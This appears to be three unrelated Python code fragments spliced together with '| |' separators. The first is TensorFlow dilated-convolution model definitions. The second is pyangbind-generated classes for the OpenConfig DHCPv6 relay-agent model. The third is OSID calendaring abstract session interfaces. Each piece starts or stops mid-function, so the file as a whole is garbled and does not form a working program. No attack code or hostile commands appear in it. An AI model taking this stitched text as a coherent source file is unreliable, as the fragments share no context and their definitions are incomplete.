filter_height = 5
W = {
"conv1": weight_variable([dim_reduction, 1, embedding_size, nkernels[0]], "W_conv1"),
"conv2": weight_variable([dim_reduction, 1, nkernels[0], nkernels[1]]),
"conv3": weight_variable([dim_reduction, 1, nkernels[1], nkernels[2]], "W_conv3"),
"conv4": weight_variable([dim_reduction, 1, nkernels[2], nkernels[2]]),
"conv5": weight_variable([dim_reduction, 1, nkernels[2], nkernels[2]]),
"conv6": weight_variable([dim_reduction, 1, nkernels[2], nkernels[2]], "W_conv6"),
# "conv7": weight_variable([dim_reduction, 1, nkernels[2], nkernels[2]]),
"hid1": weight_variable([nkernels[2], hidden]),
"hid2": weight_variable([hidden, noutputs]),
}
b = {
"conv1": bias_variable([nkernels[0]]),
"conv2": bias_variable([nkernels[1]]),
"conv3": bias_variable([nkernels[2]]),
"conv4": bias_variable([nkernels[2]]),
"conv5": bias_variable([nkernels[2]]),
"conv6": bias_variable([nkernels[2]]),
"conv7": bias_variable([nkernels[2]]),
"hid1": bias_variable([hidden]),
"hid2": bias_variable([noutputs]),
}
embeddings = tf.Variable(tf.random_uniform([5, embedding_size]))
embed = tf.nn.embedding_lookup(embeddings, x)
# and a empty axis for the height
embedded_image = tf.expand_dims(embed, 2)
# add the convolutional layers
h_conv1 = tf.nn.conv2d(embedded_image, W["conv1"], strides=[1, dim_reduction, 1, 1], padding='SAME') + b["conv1"]
h_conv1_norm = tf.nn.dropout(tf.nn.relu(_batch_norm(h_conv1, is_training, decay_rate, "conv1-norm")), dropout_keep_prob)
h_conv1_pooled = max_pool(h_conv1_norm, filter_height)
h_conv2 = atrous_conv2d(h_conv1_pooled, W["conv2"], 3) + b["conv2"]
h_conv2_norm = tf.nn.dropout(tf.nn.relu(_batch_norm(h_conv2, is_training, decay_rate, "conv2-norm")), dropout_keep_prob)
h_conv2_pooled = max_pool(h_conv2_norm, filter_height)
h_conv3 = atrous_conv2d(h_conv2_pooled, W["conv3"], 9) + b["conv3"]
h_conv3_norm = tf.nn.dropout(tf.nn.relu(_batch_norm(h_conv3, is_training, decay_rate, "conv3-norm")), dropout_keep_prob)
h_conv4 = atrous_conv2d(h_conv3_norm, W["conv4"], 27) + b["conv4"]
h_conv4_norm = tf.nn.dropout(tf.nn.relu(_batch_norm(h_conv4, is_training, decay_rate, "conv4-norm")), dropout_keep_prob)
h_conv4_pooled = max_pool(h_conv4_norm, filter_height)
h_conv5 = atrous_conv2d(h_conv4_pooled, W["conv5"], 81) + b["conv5"]
h_conv5_norm = tf.nn.dropout(tf.nn.relu(_batch_norm(h_conv5, is_training, decay_rate, "conv5-norm")), dropout_keep_prob)
h_conv6 = tf.nn.dropout(tf.nn.relu(tf.nn.conv2d_transpose(h_conv5_norm, W["conv6"], [batch_size, 25000, 1, nkernels[2]], [1, dim_reduction, 1, 1]) + b["conv6"]), dropout_keep_prob)
h_conv6_norm = tf.nn.dropout(tf.nn.relu(_batch_norm(h_conv6, is_training, decay_rate, "conv6-norm")), dropout_keep_prob)
flattened = tf.reshape(tf.squeeze(h_conv6_norm), [batch_size*25000, nkernels[2]])
hid1 = tf.nn.dropout(tf.nn.relu(tf.matmul(flattened, W["hid1"]) + b["hid1"]), dropout_keep_prob)
outputs = tf.matmul(hid1, W["hid2"]) + b["hid2"]
return outputs, W, b, embed, [h_conv6_norm]
def dilated_convolution_with_dilated_pooling(x, y_, dropout_keep_prob, batch_size, noutputs, dim_reduction=10, nkernels=[128, 240, 50], hidden=125):
# dim_reduction = 10
# nkernels = [128, 240, 50]
# hidden = 125
embedding_size = 4
filter_height = 5
W = {
"conv1": weight_variable([dim_reduction, 1, embedding_size, nkernels[0]], "W_conv1"),
"conv2": weight_variable([dim_reduction, 1, nkernels[0], nkernels[1]]),
"conv3": weight_variable([dim_reduction, 1, nkernels[1], nkernels[2]], "W_conv3"),
"conv4": weight_variable([dim_reduction, 1, nkernels[2], nkernels[2]]),
"conv5": weight_variable([dim_reduction, 1, nkernels[2], nkernels[2]]),
"conv6": weight_variable([dim_reduction, 1, nkernels[2], nkernels[2]], "W_conv6"),
# "conv7": weight_variable([dim_reduction, 1, nkernels[2], nkernels[2]]),
"hid1": weight_variable([nkernels[2], hidden]),
"hid2": weight_variable([hidden, noutputs]),
}
b = {
"conv1": bias_variable([nkernels[0]]),
"conv2": bias_variable([nkernels[1]]),
"conv3": bias_variable([nkernels[2]]),
"conv4": bias_variable([nkernels[2]]),
"conv5": bias_variable([nkernels[2]]),
"conv6": bias_variable([nkernels[2]]),
"conv7": bias_variable([nkernels[2]]),
"hid1": bias_variable([hidden]),
"hid2": bias_variable([noutputs]),
}
embeddings = tf.Variable(tf.random_uniform([5, embedding_size]))
embed = tf.nn.embedding_lookup(embeddings, x)
# and a empty axis for the height
embedded_image = tf.expand_dims(embed, 2)
# add the convolutional layers
h_conv1 = tf.nn.dropout(tf.nn.relu(tf.nn.conv2d(embedded_image, W["conv1"], strides=[1, dim_reduction, 1, 1], padding='SAME') + b["conv1"]), dropout_keep_prob)
h_conv2 = tf.nn.dropout(tf.nn.relu(atrous_conv2d(h_conv1, W["conv2"], 3) + b["conv2"]), dropout_keep_prob)
h_conv3 = tf.nn.dropout(tf.nn.relu(atrous_conv2d(h_conv2, W["conv3"], 9) + b["conv3"]), dropout_keep_prob)
h_conv4 = tf.nn.dropout(tf.nn.relu(atrous_conv2d(h_conv3, W["conv4"], 27) + b["conv4"]), dropout_keep_prob)
h_conv4_pooled = atrous_pool(h_conv4, filter_height, 27)
h_conv5 = tf.nn.dropout(tf.nn.relu(atrous_conv2d(h_conv4_pooled, W["conv5"], 81) + b["conv5"]), dropout_keep_prob)
h_conv5_pooled = atrous_pool(h_conv5, filter_height, 81)
h_conv6 = tf.nn.dropout(tf.nn.relu(tf.nn.conv2d_transpose(h_conv5_pooled, W["conv6"], [batch_size, 25000, 1, nkernels[2]], [1, dim_reduction, 1, 1]) + b["conv6"]), dropout_keep_prob)
flattened = tf.reshape(tf.squeeze(h_conv6), [batch_size*25000, nkernels[2]])
hid1 = tf.nn.dropout(tf.nn.relu(tf.matmul(flattened, W["hid1"]) + b["hid1"]), dropout_keep_prob)
outputs = tf.matmul(hid1, W["hid2"]) + b["hid2"]
return outputs, W, b, embed, [h_conv6]
def dilated_convolution_with_dilated_pooling_batchnorm(x, y_, dropout_keep_prob, batch_size, noutputs, is_training, decay_rate, dim_reduction=10, nkernels=[128, 240, 50], hidden=125):
# dim_reduction = 10
# nkernels = [128, 240, 50]
# hidden = 125
embedding_size = 4
filter_height = 5
W = {
"conv1": weight_variable([dim_reduction, 1, embedding_size, nkernels[0]], "W_conv1"),
"conv2": weight_variable([dim_reduction, 1, nkernels[0], nkernels[1]]),
"conv3": weight_variable([dim_reduction, 1, nkernels[1], nkernels[2]], "W_conv3"),
"conv4": weight_variable([dim_reduction, 1, nkernels[2], nkernels[2]]),
"conv5": weight_variable([dim_reduction, 1, nkernels[2], nkernels[2]]),
"conv6": weight_variable([dim_reduction, 1, nkernels[2], nkernels[2]], "W_conv6"),
# "conv7": weight_variable([dim_reduction, 1, nkernels[2], nkernels[2]]),
"hid1": weight_variable([nkernels[2], hidden]),
"hid2": weight_variable([hidden, noutputs]),
}
b = {
"conv1": bias_variable([nkernels[0]]),
"conv2": bias_variable([nkernels[1]]),
"conv3": bias_variable([nkernels[2]]),
"conv4": bias_variable([nkernels[2]]),
"conv5": bias_variable([nkernels[2]]),
"conv6": bias_variable([nkernels[2]]),
"conv7": bias_variable([nkernels[2]]),
"hid1": bias_variable([hidden]),
"hid2": bias_variable([noutputs]),
}
embeddings = tf.Variable(tf.random_uniform([5, embedding_size]))
embed = tf.nn.embedding_lookup(embeddings, x)
# and a empty axis for the height
embedded_image = tf.expand_dims(embed, 2)
# add the convolutional layers
h_conv1 = tf.nn.dropout(tf.nn.relu(_batch_norm(tf.nn.conv2d(embedded_image, W["conv1"], strides=[1, dim_reduction, 1, 1], padding='SAME') + b["conv1"], is_training, decay_rate, "conv1-norm")), dropout_keep_prob)
h_conv2 = tf.nn.dropout(tf.nn.relu(_batch_norm(atrous_conv2d(h_conv1, W["conv2"], 3) + b["conv2"], is_training, decay_rate, "conv2-norm")), dropout_keep_prob)
h_conv3 = tf.nn.dropout(tf.nn.relu(_batch_norm(atrous_conv2d(h_conv2, W["conv3"], 9) + b["conv3"], is_training, decay_rate, "conv3-norm")), dropout_keep_prob)
h_conv4 = tf.nn.dropout(tf.nn.relu(_batch_norm(atrous_conv2d(h_conv3, W["conv4"], 27) + b["conv4"], is_training, decay_rate, "conv4-norm")), dropout_keep_prob)
h_conv4_pooled = atrous_pool(h_conv4, filter_height, 27)
h_conv5 = tf.nn.dropout(tf.nn.relu(_batch_norm(atrous_conv2d(h_conv4_pooled, W["conv5"], 81) + b["conv5"], is_training, decay_rate, "conv5-norm")), dropout_keep_prob)
h_conv5_pooled = atrous_pool(h_conv5, filter_height, 81)
h_conv6 = tf.nn.dropout(tf.nn.relu(_batch_norm(tf.nn.conv2d_transpose(h_conv5_pooled, W["conv6"], [batch_size, 25000, 1, nkernels[2]], [1, dim_reduction, 1, 1]) + b["conv6"], is_training, decay_rate, "conv6-norm")), dropout_keep_prob)
flattened = tf.reshape(tf.squeeze(h_conv6), [batch_size*25000, nkernels[2]])
hid1 = tf.nn.dropout(tf.nn.relu(tf.matmul(flattened, W["hid1"]) + b["hid1"]), dropout_keep_prob)
outputs = tf.matmul(hid1, W["hid2"]) + b["hid2"]
return outputs, W, b, embed, [h_conv6]
def convolution_7_layer_resizing(x, y_, dropout_keep_prob, batch_size, noutputs, dim_reduction=10, nkernels=[128, 240, 50], hidden=125):
# dim_reduction = 10
# nkernels = [128, 240, 50]
# hidden = 125
embedding_size = 4
W = {
"conv1": weight_variable([dim_reduction, 1, embedding_size, nkernels[0]], "W_conv1"),
"conv2": weight_variable([dim_reduction, 1, nkernels[0], nkernels[1]]),
"conv3": weight_variable([dim_reduction, 1, nkernels[1], nkernels[2]], "W_conv3"),
"conv4": weight_variable([dim_reduction, 1, nkernels[2], nkernels[2]]),
"conv5": weight_variable([dim_reduction, 1, nkernels[2], nkernels[2]]),
"conv6": weight_variable([dim_reduction, 1, nkernels[2], nkernels[2]], "W_conv6"),
"conv7": weight_variable([dim_reduction, 1, nkernels[2], nkernels[2]], "W_conv7"),
"hid1": weight_variable([nkernels[2], hidden]),
"hid2": | |
extensions=None, namespace='http://openconfig.net/yang/relay-agent', defining_module='openconfig-relay-agent', yang_type='container', is_config=True)""",
})
self.__state = t
if hasattr(self, '_set'):
self._set()
def _unset_state(self):
self.__state = YANGDynClass(base=yc_state_openconfig_relay_agent__relay_agent_dhcpv6_interfaces_interface_state, is_container='container', yang_name="state", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/relay-agent', defining_module='openconfig-relay-agent', yang_type='container', is_config=True)
def _get_interface_ref(self):
"""
Getter method for interface_ref, mapped from YANG variable /relay_agent/dhcpv6/interfaces/interface/interface_ref (container)
YANG Description: Reference to an interface or subinterface
"""
return self.__interface_ref
def _set_interface_ref(self, v, load=False):
"""
Setter method for interface_ref, mapped from YANG variable /relay_agent/dhcpv6/interfaces/interface/interface_ref (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_interface_ref is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_interface_ref() directly.
YANG Description: Reference to an interface or subinterface
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=yc_interface_ref_openconfig_relay_agent__relay_agent_dhcpv6_interfaces_interface_interface_ref, is_container='container', yang_name="interface-ref", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/relay-agent', defining_module='openconfig-relay-agent', yang_type='container', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """interface_ref must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=yc_interface_ref_openconfig_relay_agent__relay_agent_dhcpv6_interfaces_interface_interface_ref, is_container='container', yang_name="interface-ref", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/relay-agent', defining_module='openconfig-relay-agent', yang_type='container', is_config=True)""",
})
self.__interface_ref = t
if hasattr(self, '_set'):
self._set()
def _unset_interface_ref(self):
self.__interface_ref = YANGDynClass(base=yc_interface_ref_openconfig_relay_agent__relay_agent_dhcpv6_interfaces_interface_interface_ref, is_container='container', yang_name="interface-ref", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/relay-agent', defining_module='openconfig-relay-agent', yang_type='container', is_config=True)
def _get_options(self):
"""
Getter method for options, mapped from YANG variable /relay_agent/dhcpv6/interfaces/interface/options (container)
YANG Description: Top-level container for DHCPv6 agent options on interfaces
"""
return self.__options
def _set_options(self, v, load=False):
"""
Setter method for options, mapped from YANG variable /relay_agent/dhcpv6/interfaces/interface/options (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_options is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_options() directly.
YANG Description: Top-level container for DHCPv6 agent options on interfaces
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=yc_options_openconfig_relay_agent__relay_agent_dhcpv6_interfaces_interface_options, is_container='container', yang_name="options", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/relay-agent', defining_module='openconfig-relay-agent', yang_type='container', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """options must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=yc_options_openconfig_relay_agent__relay_agent_dhcpv6_interfaces_interface_options, is_container='container', yang_name="options", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/relay-agent', defining_module='openconfig-relay-agent', yang_type='container', is_config=True)""",
})
self.__options = t
if hasattr(self, '_set'):
self._set()
def _unset_options(self):
self.__options = YANGDynClass(base=yc_options_openconfig_relay_agent__relay_agent_dhcpv6_interfaces_interface_options, is_container='container', yang_name="options", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/relay-agent', defining_module='openconfig-relay-agent', yang_type='container', is_config=True)
id = __builtin__.property(_get_id, _set_id)
config = __builtin__.property(_get_config, _set_config)
state = __builtin__.property(_get_state, _set_state)
interface_ref = __builtin__.property(_get_interface_ref, _set_interface_ref)
options = __builtin__.property(_get_options, _set_options)
_pyangbind_elements = OrderedDict([('id', id), ('config', config), ('state', state), ('interface_ref', interface_ref), ('options', options), ])
class yc_interfaces_openconfig_relay_agent__relay_agent_dhcpv6_interfaces(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module openconfig-relay-agent - based on the path /relay-agent/dhcpv6/interfaces. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: Enclosing container for the list of interface references.
"""
__slots__ = ('_path_helper', '_extmethods', '__interface',)
_yang_name = 'interfaces'
_yang_namespace = 'http://openconfig.net/yang/relay-agent'
_pybind_generated_by = 'container'
def __init__(self, *args, **kwargs):
self._path_helper = False
self._extmethods = False
self.__interface = YANGDynClass(base=YANGListType("id",yc_interface_openconfig_relay_agent__relay_agent_dhcpv6_interfaces_interface, yang_name="interface", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='id', extensions=None), is_container='list', yang_name="interface", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/relay-agent', defining_module='openconfig-relay-agent', yang_type='list', is_config=True)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path()+[self._yang_name]
else:
return ['relay-agent', 'dhcpv6', 'interfaces']
def _get_interface(self):
"""
Getter method for interface, mapped from YANG variable /relay_agent/dhcpv6/interfaces/interface (list)
YANG Description: List of interfaces on which the relay agent is
configured.
"""
return self.__interface
def _set_interface(self, v, load=False):
"""
Setter method for interface, mapped from YANG variable /relay_agent/dhcpv6/interfaces/interface (list)
If this variable is read-only (config: false) in the
source YANG file, then _set_interface is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_interface() directly.
YANG Description: List of interfaces on which the relay agent is
configured.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGListType("id",yc_interface_openconfig_relay_agent__relay_agent_dhcpv6_interfaces_interface, yang_name="interface", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='id', extensions=None), is_container='list', yang_name="interface", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/relay-agent', defining_module='openconfig-relay-agent', yang_type='list', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """interface must be of a type compatible with list""",
'defined-type': "list",
'generated-type': """YANGDynClass(base=YANGListType("id",yc_interface_openconfig_relay_agent__relay_agent_dhcpv6_interfaces_interface, yang_name="interface", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='id', extensions=None), is_container='list', yang_name="interface", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/relay-agent', defining_module='openconfig-relay-agent', yang_type='list', is_config=True)""",
})
self.__interface = t
if hasattr(self, '_set'):
self._set()
def _unset_interface(self):
self.__interface = YANGDynClass(base=YANGListType("id",yc_interface_openconfig_relay_agent__relay_agent_dhcpv6_interfaces_interface, yang_name="interface", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='id', extensions=None), is_container='list', yang_name="interface", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/relay-agent', defining_module='openconfig-relay-agent', yang_type='list', is_config=True)
interface = __builtin__.property(_get_interface, _set_interface)
_pyangbind_elements = OrderedDict([('interface', interface), ])
class yc_dhcpv6_openconfig_relay_agent__relay_agent_dhcpv6(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module openconfig-relay-agent - based on the path /relay-agent/dhcpv6. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: Top-level container for global relay agent data
"""
__slots__ = ('_path_helper', '_extmethods', '__config','__state','__options','__interfaces',)
_yang_name = 'dhcpv6'
_yang_namespace = 'http://openconfig.net/yang/relay-agent'
_pybind_generated_by = 'container'
def __init__(self, *args, **kwargs):
self._path_helper = False
self._extmethods = False
self.__config = YANGDynClass(base=yc_config_openconfig_relay_agent__relay_agent_dhcpv6_config, is_container='container', yang_name="config", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/relay-agent', defining_module='openconfig-relay-agent', yang_type='container', is_config=True)
self.__state = YANGDynClass(base=yc_state_openconfig_relay_agent__relay_agent_dhcpv6_state, is_container='container', yang_name="state", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/relay-agent', defining_module='openconfig-relay-agent', yang_type='container', is_config=True)
self.__options = YANGDynClass(base=yc_options_openconfig_relay_agent__relay_agent_dhcpv6_options, is_container='container', yang_name="options", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/relay-agent', defining_module='openconfig-relay-agent', yang_type='container', is_config=True)
self.__interfaces = YANGDynClass(base=yc_interfaces_openconfig_relay_agent__relay_agent_dhcpv6_interfaces, is_container='container', yang_name="interfaces", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/relay-agent', defining_module='openconfig-relay-agent', yang_type='container', is_config=True)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path()+[self._yang_name]
else:
return ['relay-agent', 'dhcpv6']
def _get_config(self):
"""
Getter method for config, mapped from YANG variable /relay_agent/dhcpv6/config (container)
YANG Description: Configuration data for global DHCPv6
"""
return self.__config
def _set_config(self, v, load=False):
"""
Setter method for config, mapped from YANG variable /relay_agent/dhcpv6/config (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_config is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_config() directly.
YANG Description: Configuration data for global DHCPv6
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=yc_config_openconfig_relay_agent__relay_agent_dhcpv6_config, is_container='container', yang_name="config", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/relay-agent', defining_module='openconfig-relay-agent', yang_type='container', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """config must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=yc_config_openconfig_relay_agent__relay_agent_dhcpv6_config, is_container='container', yang_name="config", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/relay-agent', defining_module='openconfig-relay-agent', yang_type='container', is_config=True)""",
})
self.__config = t
if hasattr(self, '_set'):
self._set()
def _unset_config(self):
self.__config = YANGDynClass(base=yc_config_openconfig_relay_agent__relay_agent_dhcpv6_config, is_container='container', yang_name="config", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/relay-agent', defining_module='openconfig-relay-agent', yang_type='container', is_config=True)
def _get_state(self):
"""
Getter method for state, mapped from YANG variable /relay_agent/dhcpv6/state (container)
YANG Description: Operational state data global DHCPv6
"""
return self.__state
def _set_state(self, v, load=False):
"""
Setter method for state, mapped from YANG variable /relay_agent/dhcpv6/state (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_state is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_state() directly.
YANG Description: Operational state data global DHCPv6
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=yc_state_openconfig_relay_agent__relay_agent_dhcpv6_state, is_container='container', yang_name="state", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/relay-agent', defining_module='openconfig-relay-agent', yang_type='container', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """state must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=yc_state_openconfig_relay_agent__relay_agent_dhcpv6_state, is_container='container', yang_name="state", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/relay-agent', defining_module='openconfig-relay-agent', yang_type='container', is_config=True)""",
})
self.__state = t
if hasattr(self, '_set'):
self._set()
def _unset_state(self):
self.__state = YANGDynClass(base=yc_state_openconfig_relay_agent__relay_agent_dhcpv6_state, is_container='container', yang_name="state", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/relay-agent', defining_module='openconfig-relay-agent', | |
session.
This ``Calendar`` has a default query that matches any superseding
event and a default search order that specifies no sequencing. The
queries may be examined using a ``SupersedingEventQueryInspector``.
The query may be modified by converting the inspector back to a
``SupersedingEventQuery``.
"""
__metaclass__ = abc.ABCMeta
@abc.abstractmethod
def get_calendar_id(self):
"""Gets the ``Calendar`` ``Id`` associated with this session.
:return: the ``Calendar Id`` associated with this session
:rtype: ``osid.id.Id``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.id.Id
calendar_id = property(fget=get_calendar_id)
@abc.abstractmethod
def get_calendar(self):
"""Gets the ``Calendar`` associated with this session.
:return: the ``Calendar`` associated with this session
:rtype: ``osid.calendaring.Calendar``
:raise: ``OperationFailed`` -- unable to complete request
:raise: ``PermissionDenied`` -- authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.calendaring.Calendar
calendar = property(fget=get_calendar)
@abc.abstractmethod
def can_manage_smart_calendars(self):
"""Tests if this user can manage smart calendars.
A return of true does not guarantee successful authorization. A
return of false indicates that it is known all methods in this
session will result in a ``PermissionDenied``. This is intended
as a hint to an application that may opt not to offer smart
operations.
:return: ``false`` if smart calendar methods are not authorized, ``true`` otherwise
:rtype: ``boolean``
*compliance: mandatory -- This method must be implemented.*
"""
return # boolean
@abc.abstractmethod
def get_superseding_event_query(self):
"""Gets a superseding event query.
:return: the superseding event query
:rtype: ``osid.calendaring.SupersedingEventQuery``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.calendaring.SupersedingEventQuery
superseding_event_query = property(fget=get_superseding_event_query)
@abc.abstractmethod
def get_superseding_event_search_order(self):
"""Gets a superseding event search order.
:return: the superseding event search order
:rtype: ``osid.calendaring.SupersedingEventSearchOrder``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.calendaring.SupersedingEventSearchOrder
superseding_event_search_order = property(fget=get_superseding_event_search_order)
@abc.abstractmethod
def apply_superseding_event_query(self, superseding_event_query):
"""Applies a superseding event query to this calendar.
:param superseding_event_query: the superseding event query
:type superseding_event_query: ``osid.calendaring.SupersedingEventQuery``
:raise: ``NullArgument`` -- ``superseding_event_query`` is ``null``
:raise: ``OperationFailed`` -- unable to complete request
:raise: ``PermissionDenied`` -- authorization failure occurred
:raise: ``Unsupported`` -- ``superseding_event_query`` not of this service
*compliance: mandatory -- This method must be implemented.*
"""
pass
@abc.abstractmethod
def inspect_superseding_event_query(self):
"""Gets a superseding event query inspector for this calendar.
:return: the superseding event query inspector
:rtype: ``osid.calendaring.SupersedingEventQueryInspector``
:raise: ``OperationFailed`` -- unable to complete request
:raise: ``PermissionDenied`` -- authorization failure occurred
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.calendaring.SupersedingEventQueryInspector
@abc.abstractmethod
def apply_superseding_event_sequencing(self, superseding_event_search_order):
"""Applies a superseding event search order to this calendar.
:param superseding_event_search_order: the superseding event search order
:type superseding_event_search_order: ``osid.calendaring.SupersedingEventSearchOrder``
:raise: ``NullArgument`` -- ``superseding_event_search_order`` is ``null``
:raise: ``OperationFailed`` -- unable to complete request
:raise: ``PermissionDenied`` -- authorization failure occurred
:raise: ``Unsupported`` -- ``superseding_event_search_order`` not of this service
*compliance: mandatory -- This method must be implemented.*
"""
pass
@abc.abstractmethod
def get_superseding_event_query_from_inspector(self, superseding_event_query_inspector):
"""Gets a superseding event query from an inspector.
:param superseding_event_query_inspector: a superseding event query inspector
:type superseding_event_query_inspector: ``osid.calendaring.SupersedingEventQueryInspector``
:return: the superseding event query
:rtype: ``osid.calendaring.SupersedingEventQuery``
:raise: ``NullArgument`` -- ``superseding_event_query_inspector`` is ``null``
:raise: ``Unsupported`` -- ``superseding_event_query_inspector`` is not of this service
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.calendaring.SupersedingEventQuery
class OffsetEventLookupSession:
"""This session provides methods for retrieving ``OffsetEvents``."""
__metaclass__ = abc.ABCMeta
@abc.abstractmethod
def get_calendar_id(self):
"""Gets the ``Calendar`` ``Id`` associated with this session.
:return: the ``Calendar Id`` associated with this session
:rtype: ``osid.id.Id``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.id.Id
calendar_id = property(fget=get_calendar_id)
@abc.abstractmethod
def get_calendar(self):
"""Gets the ``Calendar`` associated with this session.
:return: the ``Calendar`` associated with this session
:rtype: ``osid.calendaring.Calendar``
:raise: ``OperationFailed`` -- unable to complete request
:raise: ``PermissionDenied`` -- authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.calendaring.Calendar
calendar = property(fget=get_calendar)
@abc.abstractmethod
def can_lookup_offset_events(self):
"""Tests if this user can perform ``OffsetEvent`` lookups.
A return of true does not guarantee successful authorization. A
return of false indicates that it is known all methods in this
session will result in a ``PermissionDenied``. This is intended
as a hint to an application that may opt not to offer lookup
operations to unauthorized users.
:return: ``false`` if lookup methods are not authorized, ``true`` otherwise
:rtype: ``boolean``
*compliance: mandatory -- This method must be implemented.*
"""
return # boolean
@abc.abstractmethod
def use_comparative_offset_event_view(self):
"""The returns from the lookup methods may omit or translate elements based on this session, such as
authorization, and not result in an error.
This view is used when greater interoperability is desired at
the expense of precision.
*compliance: mandatory -- This method is must be implemented.*
"""
pass
@abc.abstractmethod
def use_plenary_offset_event_view(self):
"""A complete view of the ``OffsetEvent`` returns is desired.
Methods will return what is requested or result in an error.
This view is used when greater precision is desired at the
expense of interoperability.
*compliance: mandatory -- This method is must be implemented.*
"""
pass
@abc.abstractmethod
def use_federated_calendar_view(self):
"""Federates the view for methods in this session.
A federated view will include offset events in calendars which
are children of this calendar in the calendar hierarchy.
*compliance: mandatory -- This method is must be implemented.*
"""
pass
@abc.abstractmethod
